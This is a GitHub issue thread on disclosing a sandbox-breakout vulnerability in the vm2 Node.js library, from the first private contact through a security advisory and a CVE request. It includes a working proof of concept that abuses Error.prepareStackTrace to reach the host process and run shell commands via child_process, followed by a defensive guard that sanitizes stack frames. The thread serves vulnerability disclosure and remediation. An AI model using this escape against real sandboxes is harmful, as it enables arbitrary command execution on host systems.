vm2: Sandbox Breakout in VM2

Hello 👋 The Oxeye research team has found a sandbox breakout vulnerability in VM2. We would like to share the in-depth analysis with you so the vulnerability can be fixed. We tried to contact security@integromat.com but didn’t get any response.

Could you please share with me an email address to keep the issue private?

Best, Oxeye Research Team

About this issue

  • State: closed
  • Created 2 years ago
  • Comments: 18 (3 by maintainers)

Most upvoted comments

Hi @XmiliaH! Wanted to check whether you would consider creating a GitHub Security Advisory for this? It’s a pretty lightweight process and a nice way to make sure updates are picked up by users as soon as possible.

Unfortunately, I can’t see any configuration of roles in this repository.

I have created the empty advisory and shared access with both @XmiliaH and @oxeye-daniel.

After some exploration, I find the secrets from https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873.

```js
var vulnerabilities = function () {
  // This line inserts the vulnerability!
  global.Error.prepareStackTrace = (_, c) =>
    c.map((c) => c.getThis()).find((a) => a && a.process);
  const { stack } = new Error();
  // now you can get the process object from stack.process
  console.info(stack.process.mainModule);
  // and you can use process.mainModule.require to import any library and execute any command
  stack.process.mainModule.require('child_process').execSync('pwd');
};

vulnerabilities();
```

some reference
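The snippet above works because V8 hands the `prepareStackTrace` callback raw `CallSite` objects, and `getThis()` on one of them returns a host-realm receiver that carries `process`. As an added example (not vm2's code and not the patch in the commit linked above), here is the host-side guard pattern that closes that particular channel: the untrusted formatter only ever sees frozen plain objects with primitive frame data, so there is no `getThis`/`getFunction` to call. The `hostileFormatter` name and the probe it runs are assumptions for the demonstration; a real sandbox must also cover every other path by which host objects can reach sandboxed code.

```javascript
// Strip a V8 CallSite down to primitive data. The raw CallSite exposes
// getThis() and getFunction(), which return host-realm objects; none of
// that survives this projection.
function sanitizeCallSite(cs) {
  return Object.freeze({
    functionName: cs.getFunctionName(),
    fileName: cs.getFileName(),
    lineNumber: cs.getLineNumber(),
    columnNumber: cs.getColumnNumber(),
    isNative: cs.isNative(),
  });
}

// Install a prepareStackTrace hook on behalf of an untrusted formatter.
// The formatter never receives the CallSite array, and its result is
// coerced to a string so no object can escape through err.stack either.
function installGuardedPrepareStackTrace(untrustedFormatter) {
  Error.prepareStackTrace = (err, callSites) => {
    const safeFrames = callSites.map(sanitizeCallSite);
    return String(untrustedFormatter(err, safeFrames));
  };
}

// Setting the hook to a non-function restores V8's default formatting.
function restoreDefaultPrepareStackTrace() {
  Error.prepareStackTrace = undefined;
}

// Constructed stand-in for the probe on the page: look for a frame whose
// receiver carries `.process`. With sanitized frames there is nothing to call.
function hostileFormatter(_, frames) {
  const hit = frames.find(
    (f) => typeof f.getThis === 'function' && f.getThis() && f.getThis().process
  );
  return hit ? 'LEAKED' : `frames=${frames.length}`;
}

// Run the hostile formatter under the guard and return what err.stack became.
function runUnderGuard() {
  installGuardedPrepareStackTrace(hostileFormatter);
  try {
    return new Error('probe').stack;
  } finally {
    restoreDefaultPrepareStackTrace();
  }
}
```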

Just requested the CVE and published the advisory. Let me know if there’s anything else to do. Thank you @oxeye-daniel for reporting the issue and @XmiliaH for a quick fix!

Thanks for reaching out, you can contact me under <redacted>.

@XmiliaH - do you happen to know who the admins are for this repo and would have the necessary permissions? Thanks in advance!